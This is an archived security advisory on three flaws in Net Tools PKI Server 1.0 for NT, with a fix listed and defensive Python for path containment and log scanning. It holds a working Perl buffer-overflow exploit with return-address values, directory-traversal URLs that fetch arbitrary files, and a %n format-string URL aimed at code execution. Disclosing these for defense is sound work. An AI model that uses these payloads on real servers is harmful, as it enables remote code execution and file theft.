COMMAND

    PKI Server

SYSTEMS AFFECTED

    Net Tools PKI server 1.0 for NT (including hotfix 1 and 2)

PROBLEM

    The following is based on a CORE SDI Security Advisory.  While
    investigating the exploitability of a buffer overflow in the Net
    Tools PKI Server from Network Associates Inc., CORE SDI discovered
    three new vulnerabilities that are not fixed by hotfix 1, which was
    released to fix the problems reported by Jim Stickley of Garrison
    Technologies Inc:

        http://oliver.efri.hr/~crv/security/bugs/Others/pki.html

    Problem #1: Buffer overflow in strong.exe
    =========================================
    A buffer  overflow in  the web  server component  of the Net Tools
    PKI server allows a remote  attacker to execute arbitrary code  as
    SYSTEM on the machine running it.

    To  determine  whether  anyone  has  attempted  to  exploit   this
    vulnerability,    check    the    enroll-access.log    and     the
    admin-access.log  files  in  the  WebServer/logs directory of your
    Net Tools  PKI Server  installation.   Search for  any log entries
    which are excessively  long (greater than  500 characters).   Each
    log  entry  can  then  be  examined  to  see the IP address of the
    computer that submitted the request.

    Remote  unauthenticated  access  to  the  PKI Server, execution of
    arbitrary  commands  as  the  user  running  the enrollment server
    (System).

    Strong.exe is the web server component of the PKI Server.  It
    services requests over SSL on ports 443/tcp, 444/tcp and 445/tcp
    (default ports).  While connections to port 443/tcp require both
    client and server authentication using certificates, connections
    to port 444/tcp require no client authentication, therefore any
    user with network connectivity to the PKI server can connect via
    HTTPS to that port.

    The service running on port 443/tcp is called the Administrative
    Web Server, which is why it requires mutual authentication.  The
    service running on port 444/tcp is the Enrollment Web Server and
    does not require a client side certificate by default.  Both web
    servers are actually virtual servers serviced by strong.exe.

    A buffer overflow is present in the function that generates log
    data.  It allows the stack to be overwritten with user supplied
    data passed to the server as a URL in the HTTPS request:

        https://host:444/<2965 'A' chars>

        EAX=66206465 EBX=00F3E1C0 ECX=01FFF224 EDX=20414141
        EDI=00000000 EBP=01FFFE60 ESP=01FFF258 EIP=0040977B

    The value in EAX is part of the string (DATE+PATH+FILE+REASON)
    that gets logged, detailing the reason for the failure.  Since it
    is not a valid address, an access violation is raised a few
    instructions after the overwrite:

        mov ecx,[eax+000000E4]

    The request above does not overwrite EIP, and it kills the server
    before EIP is reached, but a slight variation of it lets an
    attacker overwrite EBP and EIP and, by carefully overwriting local
    variables, control the execution of arbitrary code on the target
    machine.

    A sample, proof of concept perl script exemplifies this:

        #!/usr/bin/perl
        # NAI NetTools PKI SERVER 1.0 - Long URL Stack Overflow Exploit
        # Replace host and port and create the html file:
        #   ./pkiluso.pl > test.html
        # Open the html in a SSL compatible browser and click on the link. puf!
        # Juliano Rizzo (c) 2000 juliano@core-sdi.com

        $host = "localhost";
        $port = "444";
        $shell_code = "\x90\x90\x90\x90";

        # We can set the values of EIP and EBP, our code is on the stack
        # and in 0x01613A2E.
        $eip = "\x2E\x3A\x61\x01";  # 0x01613A2E (URL read from socket)
        #$eip = "\x64\x83\x40%00";  # 0x00408364 (CALL EBP)
        $ebp = "\xCB\xF2\x01\x02";  # 0x0200F2CB (truncates the string at the 00)
        $noplen = (2965 - length($shell_code));
        print "<html><body><a href=\"https://".$host.":".$port."/";
        print "\x90" x $noplen;
        print
        $shell_code.$ebp.$eip."\x18\x6B\x62\x01\x18\x6B\x62\x01\x18\x6B\x62\x01".
        "\">Click here to exploit.!</a></body></html>";

    Problem #2: Directory traversal vulnerability
    =============================================
    The default installation of Net  Tools PKI server allows a  remote
    attacker to view and download any file residing on the server.  To
    determine   whether   anyone   has   attempted   to  exploit  this
    vulnerability,    check    the    enroll-access.log    and     the
    admin-access.log files in the WebServer/logs directory of your Net
    Tools  PKI  Server  installation.   Search  for  any  log  entries
    containing "..\" within them. Each log entry can then be  examined
    to see the IP address of the computer that submitted the  request.

    Remote unauthenticated access to any file on the PKI server.

    By specifying '..\'  in  HTTPS requests to the enrollment  server,
    an  attacker   can  navigate   the  server's   file  system    and
    view/download  any  file  if  its  name  is known.  By default the
    enrollment server uses

        \Program Files\Network Associates\Net Tools PKI Server\WebServer\enroll-server

    as the Web Root directory.  If a file name is known (e.g.
    autoexec.bat), the attacker just needs to supply the remaining
    path components to access it:

        https://host:444/..\..\..\..\..\autoexec.bat

    will display the contents of the file in the browser.  If a
    filename is not known, the web server will reveal its web root
    directory in an error message shown to the client:

        https://host:444/..\..\pirulo.pdf will result in:

        File Not Found

        The requested URL /..\..\pirulo.pdf was not found on this server.

    There was  also some  additional information  available about  the
    error:

        [Tue Jun 27 19:47:33 2000] access to C:\Program Files\Network Associates\Net Tools PKI Server\WebServer\enroll-server/..\..\pirulo.pdf failed for a.b.c.d, reason: File does not exist
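    As an added example (not code from the advisory or from the product), the
    following Python shows the containment check the enrollment server lacked: it
    maps a request onto the default web root quoted above using Windows path
    semantics, so both "/" and "\" act as separators, and rejects any request that
    resolves outside the root.  The function name and the sample requests in the
    test are constructed; the C: drive is assumed.

```python
import ntpath
from urllib.parse import unquote

# Default enrollment web root named in the advisory (drive letter assumed).
WEB_ROOT = r'C:\Program Files\Network Associates\Net Tools PKI Server\WebServer\enroll-server'

def resolve_request_path(web_root, url_path):
    """Map a request path onto web_root with Windows path semantics.

    Returns the absolute file path, or None when the request escapes the
    root.  ntpath treats both '/' and '\\' as separators, so "..\\" segments,
    encoded or not, are collapsed before the containment check instead of
    being handed to the file system as-is.
    """
    decoded = unquote(url_path, encoding='latin-1')        # %2e%2e%5c -> ..\
    relative = decoded.lstrip('/\\')
    root = ntpath.normpath(web_root)
    candidate = ntpath.normpath(ntpath.join(root, relative))
    # Compare case-insensitively and on a segment boundary, so a sibling
    # directory whose name merely starts with the root cannot pass.
    if candidate.lower() == root.lower():
        return candidate
    if candidate.lower().startswith(root.lower() + '\\'):
        return candidate
    return None

if __name__ == '__main__':
    for req in ('/index.html', r'/..\..\..\..\..\autoexec.bat'):
        print(req, '->', resolve_request_path(WEB_ROOT, req))
```

    On a rejected request the handler should answer with a plain 404 that echoes
    only the requested URL, not the resolved path, so the web root is not disclosed
    as in the error message above.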

    Problem #3: Format strings with user supplied data
    ==================================================
    The Net Tools PKI Server fails to properly validate the data passed
    as arguments to the server's logging routines, which allows a
    remote attacker to execute arbitrary code as SYSTEM on the machine
    running it.

    Remote  unauthenticated  access  to  the  PKI Server, execution of
    arbitrary  commands  as  the  user  running  the enrollment server
    (System).

    The user supplied URL is processed by Strong.exe and, if the .XUDA
    extension is found, the request is forwarded to XUDAD.EXE for
    further processing.  Prior to this "hand-off" the URL string is
    parsed, filtered for metacharacters and passed to a function that
    logs the request.  Somewhere along the processing path, the user
    supplied data becomes the format string for a formatted output
    function similar to the ANSI C sprintf().  This allows a remote
    attacker to provide data that will force that function into
    overwriting arbitrary portions of the process memory and cause
    either a denial of service or the execution of arbitrary code.  To
    exemplify this, the following URL will cause a DoS:

        https://host:444/%25%25s.xuda

    Notice that the hex value 0x25 represents the ASCII character '%',
    thus the URL string will get converted to "%%s.xuda" and
    subsequently to "%s.xuda".  A more elaborate attack might try to
    overwrite the return address on the stack to force the server into
    executing arbitrary code.  Proof of concept, sample URL:

        https://host:444/xxx%3c%b9%ff%01%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25x%25n.xuda
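    As an added detection example (not code from the advisory or from CORE SDI),
    the following Python scans log lines for the three indicators the advisory
    describes: entries longer than 500 characters (Problem #1), "..\" in the
    request (Problem #2), and URL-escaped printf conversions in a .xuda request
    (Problem #3), and pairs each hit with the client IP.  The advisory names
    enroll-access.log and admin-access.log but does not show their layout, so the
    sample entries are constructed in an assumed Common Log Format.

```python
import re
from urllib.parse import unquote

# Constructed sample entries in an assumed Common Log Format; the advisory
# names enroll-access.log / admin-access.log but does not show their layout.
SAMPLE_LOG = [
    '10.0.0.7 - - [27/Jun/2000:19:45:01 -0300] "GET /request.xuda HTTP/1.0" 200 512',
    '10.0.0.9 - - [27/Jun/2000:19:46:10 -0300] "GET /..\\..\\..\\..\\..\\autoexec.bat HTTP/1.0" 200 233',
    '10.0.0.9 - - [27/Jun/2000:19:47:33 -0300] "GET /%25%25s.xuda HTTP/1.0" 500 -',
    '10.0.0.11 - - [27/Jun/2000:19:48:02 -0300] "GET /' + 'A' * 2965 + ' HTTP/1.0" 500 -',
]

IP_RE = re.compile(r'\b(\d{1,3}(?:\.\d{1,3}){3})\b')
REQ_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)')
FMT_RE = re.compile(r'%[-+ 0#]*\d*(?:\.\d+)?[sxXndcpu]')   # printf-style conversions
LONG_ENTRY = 500   # length threshold the advisory gives for Problem #1

def indicators(line):
    """Return the advisory indicators matched by one log line."""
    found = []
    if len(line) > LONG_ENTRY:
        found.append('long-entry')            # Problem #1: strong.exe overflow
    m = REQ_RE.search(line)
    raw = m.group(1) if m else line
    decoded = unquote(raw, encoding='latin-1')   # %25 -> %, %5c -> \, ...
    if '..\\' in decoded or '../' in decoded:
        found.append('traversal')             # Problem #2: "..\" in the path
    # The logger re-expands the string printf-style, so "%%s" becomes "%s".
    expanded = decoded.replace('%%', '%')
    if expanded.lower().endswith('.xuda') and FMT_RE.search(expanded):
        found.append('format-string')         # Problem #3: %25%25s.xuda
    return found

def scan(lines):
    """Pair every suspicious line with the client IP for follow-up."""
    hits = []
    for line in lines:
        found = indicators(line)
        if found:
            ip = IP_RE.search(line)
            hits.append((ip.group(1) if ip else '?', found))
    return hits

if __name__ == '__main__':
    for ip, found in scan(SAMPLE_LOG):
        print(ip, ', '.join(found))
```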

SOLUTION

    Network Associates Inc.  has released Hotfix  3 for the  Net Tools
    PKI Server.  It corrects the  three problems.  It can be  obtained
    from:

        http://www.nai.com/asp_set/download/upgrade/find.asp

    Or contact Network Associates Technical support at 1-800-722-3709.